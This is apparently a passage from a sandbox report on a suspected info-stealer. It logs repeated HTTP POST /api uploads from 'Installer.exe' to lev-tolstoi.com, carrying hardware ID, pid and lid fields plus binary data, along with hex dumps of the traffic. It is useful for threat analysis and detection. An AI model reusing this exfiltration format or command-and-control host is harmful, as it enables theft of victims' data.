                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 44 52 32 6b 6d 64 58 46 39 6c 49 42 59 66 55 6a 4d 74 72 44 37 66 64 52 4e 63 4c 67 59 4a 41 61 6b 4b 64 6c 2f 72 39 67 64 37 38 58 47 4f 36 4b 6e 39 43 2f 55 77 45 69 72 6d 56 34 6d 49 66 70 34 78 68 68 6a 38 42 70 6e 42 75 55 70 48 4c 2f 2b 69 38 38 75 52 30 58 70 4e 36 4e 7a 4b 46 53 45 6d 2b 30 49 7a 2f 61 68 37 61 37 55 69 76 4b 37 32 43 64 45 70 43 72 61 66 69 2f 63 33 53 78 48 42 76 73 67 35 54 61 73 31 67 4b 4b 71 35 78 4b 74 58 44 34 50 63 59 64 34 2f 6d 66 4e 64 50 31 49 4a 30 2b 36 70 6e 66 2f 63 45 57 66 33 47 6e 4e 44 32 44 55 30 68 6f 32 38 7a 30 63 7a 6c 2f 31 77 35 77 75 70 71 6d 52 36 59 72 32 2f 2f 71 47 78 35 76 78 45 65 34 59 71 57 33 36 52 57 44 47 48 6a 49 7a 2f 4f 68 37 61 37 66 77 72 34 77 69 53 49 57 59 33 6e 5a 50 54 36 4f 54 79
                                                                                                                                                                                                                                                  Data Ascii: DR2kmdXF9lIBYfUjMtrD7fdRNcLgYJAakKdl/r9gd78XGO6Kn9C/UwEirmV4mIfp4xhhj8BpnBuUpHL/+i88uR0XpN6NzKFSEm+0Iz/ah7a7UivK72CdEpCrafi/c3SxHBvsg5Tas1gKKq5xKtXD4PcYd4/mfNdP1IJ0+6pnf/cEWf3GnND2DU0ho28z0czl/1w5wupqmR6Yr2//qGx5vxEe4YqW36RWDGHjIz/Oh7a7fwr4wiSIWY3nZPT6OTy
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 38 61 45 6b 71 38 56 43 69 33 74 4f 33 6a 52 7a 2b 62 31 57 7a 2f 45 37 57 69 57 48 70 4b 69 61 2f 2b 31 5a 6e 57 77 47 78 48 32 67 5a 62 56 74 6c 34 45 4b 36 6c 69 4d 35 61 4a 72 76 78 41 65 5a 65 68 56 70 41 42 68 4b 51 6a 35 2f 52 34 50 4c 41 58 56 37 7a 47 6c 73 36 33 55 42 38 6c 6f 6d 67 71 33 63 48 75 2f 6b 6f 2b 77 2b 74 72 6c 42 2b 5a 70 47 76 71 75 6d 78 38 70 51 6b 52 37 34 6a 62 6b 76 5a 53 46 57 48 31 49 77 6e 42 7a 4b 37 6b 46 69 43 50 35 6d 6a 58 54 39 53 6b 61 66 57 30 63 33 69 78 45 42 54 71 6a 70 37 55 73 6c 38 41 4c 71 5a 70 4d 64 37 48 34 66 35 51 4d 73 6e 76 5a 5a 45 62 6d 65 63 74 75 4c 31 35 50 4f 39 62 4d 50 36 4c 6e 63 75 6e 59 41 6f 68 2f 43 4d 6e 6d 4e 36 75 2f 46 52 35 6c 36 46 70 6d 78 32 5a 6f 6d 66 77 76 57 4a 39 75 78 38 61
                                                                                                                                                                                                                                                  Data Ascii: 8aEkq8VCi3tO3jRz+b1Wz/E7WiWHpKia/+1ZnWwGxH2gZbVtl4EK6liM5aJrvxAeZehVpABhKQj5/R4PLAXV7zGls63UB8lomgq3cHu/ko+w+trlB+ZpGvqumx8pQkR74jbkvZSFWH1IwnBzK7kFiCP5mjXT9SkafW0c3ixEBTqjp7Usl8ALqZpMd7H4f5QMsnvZZEbmectuL15PO9bMP6LncunYAoh/CMnmN6u/FR5l6Fpmx2ZomfwvWJ9ux8a
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 54 32 57 77 41 6e 72 47 49 77 33 73 66 6f 38 56 77 36 78 75 4a 6a 6e 68 47 66 70 47 6e 33 76 57 64 34 74 78 41 51 36 6f 43 65 31 37 38 56 51 32 47 71 65 33 69 4f 68 38 6a 59 53 69 76 39 37 32 65 4d 56 34 76 70 65 72 69 39 62 54 7a 76 57 78 7a 73 69 59 6e 5a 76 31 30 4a 4b 4b 31 6e 4d 74 76 41 37 76 35 56 50 4d 76 76 59 4a 41 58 6d 4b 68 6b 38 4c 56 6c 66 4c 68 62 57 61 53 42 67 35 7a 75 46 53 30 71 75 30 49 32 33 64 57 75 35 42 59 67 6a 2b 5a 6f 31 30 2f 55 71 57 72 35 73 6d 39 77 76 78 38 46 35 49 32 53 30 37 64 61 44 53 4b 73 61 54 44 45 77 65 37 77 55 44 37 48 35 57 71 46 46 70 76 6e 4c 62 69 39 65 54 7a 76 57 79 62 79 67 5a 7a 54 39 48 77 4b 4f 71 78 70 4f 39 33 4c 72 75 51 57 49 49 2f 6d 61 4e 64 50 31 4b 70 76 39 62 35 7a 63 4c 63 62 48 75 4f 4d 69
                                                                                                                                                                                                                                                  Data Ascii: T2WwAnrGIw3sfo8Vw6xuJjnhGfpGn3vWd4txAQ6oCe178VQ2Gqe3iOh8jYSiv972eMV4vperi9bTzvWxzsiYnZv10JKK1nMtvA7v5VPMvvYJAXmKhk8LVlfLhbWaSBg5zuFS0qu0I23dWu5BYgj+Zo10/UqWr5sm9wvx8F5I2S07daDSKsaTDEwe7wUD7H5WqFFpvnLbi9eTzvWybygZzT9HwKOqxpO93LruQWII/maNdP1Kpv9b5zcLcbHuOMi
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 4d 4c 61 64 6b 4e 73 54 47 35 50 64 5a 50 73 6a 71 64 70 77 46 6e 36 39 67 39 72 4a 6f 66 4c 6b 62 46 75 6d 47 32 35 4c 32 55 68 56 68 39 53 4d 64 39 64 44 34 38 52 6f 61 32 50 64 75 6b 42 75 43 72 47 4c 37 72 47 78 73 39 31 56 58 39 59 47 4b 6e 4f 35 44 48 54 61 71 66 48 62 50 68 2b 6e 33 47 47 47 50 36 6d 75 5a 47 70 2b 6a 61 76 32 79 59 6e 6d 79 45 52 76 6f 68 35 50 56 76 46 41 49 4a 36 64 67 4e 74 6e 47 34 76 39 52 4e 38 61 68 4b 74 63 51 6a 4f 63 37 75 49 78 78 65 36 38 57 42 36 61 30 6d 4d 32 6e 51 41 41 78 71 79 45 58 31 63 76 74 2f 6c 38 70 6a 2f 34 71 6a 6c 65 54 71 79 4f 67 2b 6d 46 34 75 78 67 51 36 6f 6d 57 30 37 46 65 41 69 75 6a 63 54 66 54 7a 2b 4c 7a 56 53 76 46 36 33 61 65 48 70 6d 70 61 2b 71 35 49 54 4c 33 48 41 2b 6b 33 74 76 75 76 46
                                                                                                                                                                                                                                                  Data Ascii: MLadkNsTG5PdZPsjqdpwFn69g9rJofLkbFumG25L2UhVh9SMd9dD48Roa2PdukBuCrGL7rGxs91VX9YGKnO5DHTaqfHbPh+n3GGGP6muZGp+jav2yYnmyERvoh5PVvFAIJ6dgNtnG4v9RN8ahKtcQjOc7uIxxe68WB6a0mM2nQAAxqyEX1cvt/l8pj/4qjleTqyOg+mF4uxgQ6omW07FeAiujcTfTz+LzVSvF63aeHpmpa+q5ITL3HA+k3tvuvF
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 63 7a 76 54 77 4e 44 46 56 6a 37 62 35 6d 71 52 46 39 54 70 49 2f 66 36 4f 55 58 33 55 31 66 62 79 4e 76 45 39 67 31 4e 46 4b 35 74 4e 74 48 52 2f 37 5a 37 4c 74 6e 72 66 39 55 78 6b 37 5a 71 37 72 64 7a 50 50 6c 62 45 61 54 65 79 35 4c 32 55 52 78 68 39 54 4e 71 6a 5a 4b 39 72 41 68 72 30 4b 39 39 31 77 48 55 2f 7a 47 32 2b 6e 4d 38 37 31 74 51 35 35 53 4a 32 72 56 44 44 6d 61 54 58 52 6a 64 30 65 2f 32 55 7a 58 78 33 33 47 55 47 5a 71 67 64 65 6e 36 4c 7a 79 34 57 30 2f 64 78 74 4f 63 69 52 74 4e 4f 65 30 37 65 4f 50 45 34 50 56 66 4c 39 36 73 52 4a 77 42 6c 61 70 6f 39 50 68 67 63 61 63 63 56 36 72 47 6e 5a 7a 75 42 55 4e 68 71 58 4a 34 6a 70 65 38 6f 41 31 71 6d 4c 45 32 69 46 6d 4e 35 33 57 34 34 6a 4d 79 39 77 6c 58 76 4d 62 63 33 36 52 48 43 79 4b
                                                                                                                                                                                                                                                  Data Ascii: czvTwNDFVj7b5mqRF9TpI/f6OUX3U1fbyNvE9g1NFK5tNtHR/7Z7Ltnrf9Uxk7Zq7rdzPPlbEaTey5L2URxh9TNqjZK9rAhr0K991wHU/zG2+nM871tQ55SJ2rVDDmaTXRjd0e/2UzXx33GUGZqgden6Lzy4W0/dxtOciRtNOe07eOPE4PVfL96sRJwBlapo9PhgcaccV6rGnZzuBUNhqXJ4jpe8oA1qmLE2iFmN53W44jMy9wlXvMbc36RHCyK
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 59 65 67 75 31 35 35 6c 37 4d 71 31 78 4f 46 35 7a 75 6f 36 44 6f 70 35 45 78 48 74 70 6e 56 78 66 5a 44 54 58 6e 2f 4c 58 6a 45 68 37 61 37 48 7a 72 64 38 32 4b 55 41 5a 66 67 58 63 61 63 59 6e 75 78 47 42 6e 7a 6c 39 6e 7a 74 56 34 42 4c 61 70 31 42 75 6a 53 37 66 56 57 50 74 6e 77 4a 4e 6c 58 6d 2b 63 37 77 66 70 77 64 72 42 58 58 36 69 58 69 4e 4b 39 51 77 70 68 6b 69 31 34 7a 6f 65 32 75 32 30 36 77 65 39 6a 67 51 62 5a 67 57 44 2f 76 47 4a 79 6f 41 70 58 71 73 61 64 6e 4f 34 48 51 32 47 70 63 6e 69 4f 6c 37 79 67 44 57 71 59 73 54 61 49 57 59 33 6e 64 62 6a 69 4d 6a 4c 33 43 56 65 38 78 74 7a 53 75 31 51 4f 4c 36 35 78 4b 74 44 45 2b 50 67 66 42 2f 48 45 61 5a 6f 53 6d 71 42 64 78 70 74 72 62 4c 6f 55 45 4e 71 34 72 4d 32 78 52 55 38 48 72 6e 55 37
                                                                                                                                                                                                                                                  Data Ascii: Yegu155l7Mq1xOF5zuo6Dop5ExHtpnVxfZDTXn/LXjEh7a7Hzrd82KUAZfgXcacYnuxGBnzl9nztV4BLap1BujS7fVWPtnwJNlXm+c7wfpwdrBXX6iXiNK9Qwphki14zoe2u206we9jgQbZgWD/vGJyoApXqsadnO4HQ2GpcniOl7ygDWqYsTaIWY3ndbjiMjL3CVe8xtzSu1QOL65xKtDE+PgfB/HEaZoSmqBdxptrbLoUENq4rM2xRU8HrnU7


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.449737104.21.66.864437488C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:13:32 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=PTTT95CE7
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 18114
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:13:32 UTC15331OUTData Raw: 2d 2d 50 54 54 54 39 35 43 45 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 41 43 37 41 44 35 46 37 37 35 44 46 42 37 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 50 54 54 54 39 35 43 45 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 54 54 54 39 35 43 45 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 32 32 33 31 39 38 36 37 31 0d 0a 2d 2d 50 54 54 54 39 35 43 45 37 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                  Data Ascii: --PTTT95CE7Content-Disposition: form-data; name="hwid"4EAC7AD5F775DFB71441EDD8E05CE3DA--PTTT95CE7Content-Disposition: form-data; name="pid"2--PTTT95CE7Content-Disposition: form-data; name="lid"yau6Na--5223198671--PTTT95CE7Content
                                                                                                                                                                                                                                                  2024-12-27 22:13:32 UTC2783OUTData Raw: c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f
                                                                                                                                                                                                                                                  Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_
                                                                                                                                                                                                                                                  2024-12-27 22:13:33 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:33 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=cl53q3p7ftlmtcerli4tovjj31; expires=Tue, 22 Apr 2025 16:00:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8T%2FJbKZppfl02RFZaJwJ6pb74zjbP7m7Dql3zPxt1rygLUKXtypNmB1r0TFMHnMVkJfmf9xwjpDokeqQOzZX4H9jN5E1%2BGTu8a57AB25sCGAjFZYKaU%2BK28mpw5yYD5Vnw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8ca890ef1543a6-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1695&rtt_var=663&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19066&delivery_rate=1722713&cwnd=186&unsent_bytes=0&cid=14b7ac484a1eece2&ts=985&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:13:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2024-12-27 22:13:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.449738104.21.66.864437488C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:13:35 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=V65PP5PG20H
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8747
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:13:35 UTC8747OUTData Raw: 2d 2d 56 36 35 50 50 35 50 47 32 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 41 43 37 41 44 35 46 37 37 35 44 46 42 37 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 56 36 35 50 50 35 50 47 32 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 36 35 50 50 35 50 47 32 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 32 32 33 31 39 38 36 37 31 0d 0a 2d 2d 56 36 35 50 50 35 50 47 32 30 48 0d
                                                                                                                                                                                                                                                  Data Ascii: --V65PP5PG20HContent-Disposition: form-data; name="hwid"4EAC7AD5F775DFB71441EDD8E05CE3DA--V65PP5PG20HContent-Disposition: form-data; name="pid"2--V65PP5PG20HContent-Disposition: form-data; name="lid"yau6Na--5223198671--V65PP5PG20H
                                                                                                                                                                                                                                                  2024-12-27 22:13:36 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:35 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=b62b4gd1g88nnuq2bpsgg4ll4o; expires=Tue, 22 Apr 2025 16:00:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cEqAPknwBAdhvMqXYl%2FEkwqOnpPZ7Z5hHCf1Vphy0xw2DYt8NK5hBIx0aXHCM4I9ehHxwMS2ooI0PWVfqYE%2BB5%2FWC6Iwru8BE13iItMZQ7PzdvCGb%2FzS0TXpb9xFqvKiy9I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8ca89ffcb7f78d-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1487&min_rtt=1485&rtt_var=561&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2834&recv_bytes=9678&delivery_rate=1945369&cwnd=104&unsent_bytes=0&cid=0edef60d6ba53bc3&ts=830&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:13:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2024-12-27 22:13:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.449739104.21.66.864437488C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:13:37 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=L860Q9XLZ5OUXDNV6
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 20436
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:13:37 UTC15331OUTData Raw: 2d 2d 4c 38 36 30 51 39 58 4c 5a 35 4f 55 58 44 4e 56 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 41 43 37 41 44 35 46 37 37 35 44 46 42 37 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 4c 38 36 30 51 39 58 4c 5a 35 4f 55 58 44 4e 56 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 38 36 30 51 39 58 4c 5a 35 4f 55 58 44 4e 56 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 32 32 33 31 39 38 36
                                                                                                                                                                                                                                                  Data Ascii: --L860Q9XLZ5OUXDNV6Content-Disposition: form-data; name="hwid"4EAC7AD5F775DFB71441EDD8E05CE3DA--L860Q9XLZ5OUXDNV6Content-Disposition: form-data; name="pid"3--L860Q9XLZ5OUXDNV6Content-Disposition: form-data; name="lid"yau6Na--52231986
                                                                                                                                                                                                                                                  2024-12-27 22:13:37 UTC5105OUTData Raw: 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00
                                                                                                                                                                                                                                                  Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                  2024-12-27 22:13:38 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:38 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=3lminkoju1frtj8q10920i1q18; expires=Tue, 22 Apr 2025 16:00:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f2DQHFPwa04XmRrsZofzst%2BnBSDVpGS6T1%2FaW81SS4qPC626XZ0U5k36h9vuPVXA%2Fvw5Ncb5%2B9%2BetV7srj4uXpetNAIVBRIwG%2B76ZY1vHAYKF4i4W7JKjdriP62qZdDYkPI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8ca8aded467c99-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1893&min_rtt=1863&rtt_var=720&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21396&delivery_rate=1567364&cwnd=235&unsent_bytes=0&cid=e3ea1f35ab5e2f2a&ts=959&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:13:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2024-12-27 22:13:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.449741104.21.66.864437488C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:13:40 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=I6ZOP83R0K
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 1218
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
